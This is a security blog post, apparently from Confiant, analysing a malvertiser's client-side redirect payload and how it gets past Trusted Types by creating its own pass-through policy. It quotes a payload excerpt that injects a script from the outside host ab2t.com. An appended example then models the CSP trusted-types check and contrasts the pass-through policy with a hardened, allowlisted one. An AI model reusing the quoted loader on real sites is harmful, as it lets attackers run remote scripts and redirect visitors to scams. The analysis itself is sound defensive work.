The Curious Case Of MutantBedrog’s Trusted-Types CSP Bypass

MutantBedrog is a malvertiser that caught our attention early summer ’04 for their highly disruptive forced redirect campaigns and the unique JavaScript payload that they use to fingerprint devices and dispatch invasive redirections.

While a comprehensive report on MutantBedrog’s TTPs is available here, this blog post will hyper-focus on a very specific technical tidbit from their client-side redirect payload.

For reference, the full payload is available in the following gist:

https://medium.com/media/cdb8efa30aee218927ef5d593cdf21ac/href

This code includes a lot of familiar tactics, but tldr: it’s a slightly convoluted mess of multi-stage client-side fingerprinting and DOM manipulation that exists purely to spawn a hopefully unmitigated redirect to a scam landing page.

One of the things that stood out to us right away was the multiple references to Content Security Policy (CSP) and Trusted Types that appear at every stage of execution.

Let’s zoom in on some excerpts for clarity:

if (!j && typeof trustedTypes !== 'undefined') {
  try {
    var y =
      '\net = () => {\n var t = Math.round(Date.now() / 1000).toString();\n var es = "";\n for (var i = 0; i < t.length; i++) {\n var c = t.charCodeAt(i);\n es += String.fromCharCode(c + 10);\n }\n return encodeURIComponent(btoa(es));\n};\ntry {\nif (typeof trustedTypes !== "undefined") {\nconst rp = trustedTypes.createPolicy("rp", {\ncreateScriptURL: (input) => input,\n});\nvar script = document.createElement("script");\nscript.src = rp.createScriptURL(\n"https://ab2t.com/v2/banner/pix?id=5d83bs12&aid=ttd006&tid=' +
      (window['_tk'] || 0) +
      '&p="+et()\n);\nscript.type = "text/javascript";\nscript.onload = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\nscript.onerror = function () {\nscript.parentNode.removeChild(script);\nwindow.parent.postMessage("distroy", "*");\n};\ndocument.head.appendChild(sc
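The point of the excerpt is that the payload does not defeat Trusted Types at all: it simply registers its own policy named "rp" whose createScriptURL returns its input untouched, which only works when the page's CSP lets any policy name be created. The following is an added example, not code from the Confiant post or from the payload: a small model of the CSP `trusted-types` directive check that decides whether that createPolicy("rp", ...) call succeeds, next to a validating createScriptURL a site could ship instead of a pass-through. The CSP strings, the "app-policy" name and the example.com origins are constructed for illustration.

```javascript
// Added example, not code from the Confiant post or from the payload:
// a model of the CSP `trusted-types` directive check that decides whether
// trustedTypes.createPolicy(name, rules) succeeds, and a validating
// createScriptURL to contrast with the payload's pass-through `(input) => input`.

// Parse the `trusted-types` directive of a CSP header into an allowlist.
// Returns null when the directive is absent (the policy factory is then unrestricted).
function parseTrustedTypesDirective(csp) {
  const directive = csp.split(';').map(s => s.trim())
    .find(s => /^trusted-types(\s|$)/.test(s));
  if (!directive) return null;
  const tokens = directive.split(/\s+/).slice(1);
  return {
    names: new Set(tokens.filter(t => t !== '*' && !t.startsWith("'"))),
    wildcard: tokens.includes('*'),
    allowDuplicates: tokens.includes("'allow-duplicates'"),
  };
}

// Would createPolicy(name) succeed under `csp`, given the policy names already
// created on the page? Modelled on the spec's "Should Trusted Type policy
// creation be blocked by CSP?" algorithm (assumption: a single CSP header).
function policyCreationAllowed(csp, name, existing = new Set()) {
  const tt = parseTrustedTypesDirective(csp);
  if (tt === null) return true;                       // no directive: anything goes
  if (existing.has(name) && !tt.allowDuplicates) return false;
  return tt.wildcard || tt.names.has(name);           // 'none' or empty list: nothing
}

// The payload's own rules: every string is trusted as-is.
const passThroughRules = { createScriptURL: (input) => input };

// Defender-side rules: only script URLs from allowlisted origins are trusted.
// The origins below are placeholders constructed for this example.
const ALLOWED_SCRIPT_ORIGINS = new Set(['https://static.example.com']);
const hardenedRules = {
  createScriptURL: (input) => {
    const url = new URL(input, 'https://app.example.com');
    if (!ALLOWED_SCRIPT_ORIGINS.has(url.origin)) {
      throw new TypeError(`script URL origin not allowed: ${url.origin}`);
    }
    return url.href;
  },
};

// Convenience wrapper: does `rules` accept `input`? Returns the output or null.
function scriptUrlAccepted(rules, input) {
  try { return rules.createScriptURL(input); } catch (e) { return null; }
}
```

With `require-trusted-types-for 'script'` alone, the payload's createPolicy("rp", ...) is permitted and the bypass works; adding `trusted-types app-policy` (no wildcard, no 'allow-duplicates') makes that call throw before any script URL is ever created.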

[...]

This article has been indexed from Confiant - Medium
